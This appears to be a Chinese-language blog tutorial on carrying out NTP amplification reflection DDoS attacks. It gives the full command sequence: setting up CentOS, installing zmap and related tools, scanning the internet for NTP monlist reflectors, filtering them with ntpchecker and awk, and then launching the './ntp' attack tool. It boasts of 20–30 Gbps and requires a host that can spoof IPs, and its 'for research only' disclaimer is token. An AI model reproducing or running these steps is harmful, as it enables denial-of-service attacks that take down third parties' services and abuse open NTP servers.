NTP放大反射DDOS攻击扫描教程,放大列表扫描教程

NTP放大反射DDOS攻击扫描教程,放大列表扫描教程

图上是国外测的 本文实测 能有二三十G

声明:文章中介绍的工具、技术带有一定的攻击性,仅供安全研究,请合理合法使用。!
关于有些服务器不能发起攻击的问题 请自己检查系统 实测脚本没有问题!
注意服务器要支持ip伪造/欺骗

本文使用的服务器系统
centos 6.6 64位
内核
2.6.32-504.el6.x86_64

先更新系统
yum -y update
复制代码

区分centos6 centos7 执行不同的命令!
Centos 6
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
复制代码
centos 7
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm
复制代码

安装必要的依赖环境!
yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap
复制代码

上传这里的文件到你的机器!
游客,如果您要查看本帖隐藏内容请回复

开始扫描ntp放大列表
zmap -p 123 -M udp –probe-args=file:ntp_123_monlist.pkt -o monlist_fingerprint.txt
复制代码
扫描时间比较长
扫描完成后

运行 ntp、ntpchecker
首先给它的权限:
chmod 777 ntp
chmod 777 ntpchecker
复制代码

运行ntpchecker
./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
复制代码

开始执行过滤!
awk ‘$2>419{print $1}’ step1.txt | sort -n | uniq | sort -R > ntpamp.txt
复制代码

过滤完成后就可以攻击了
./ntp

3 thoughts on “NTP放大反射DDOS攻击扫描教程,放大列表扫描教程”

发表评论

电子邮件地址不会被公开。 必填项已用*标注